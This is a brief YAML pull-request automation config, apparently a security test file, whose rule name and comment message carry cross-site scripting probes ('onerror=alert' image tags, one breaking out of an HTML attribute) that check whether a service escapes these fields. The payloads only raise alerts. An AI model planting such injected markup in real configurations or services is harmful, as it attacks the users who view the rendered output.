pull_request_rules:
  - name: '"><img src=x onerror=alert(4)>'
    conditions:
      - base = main
    actions:
      comment:
        message: "{{ author }} says: <img src=x onerror=alert(document.domain)>"
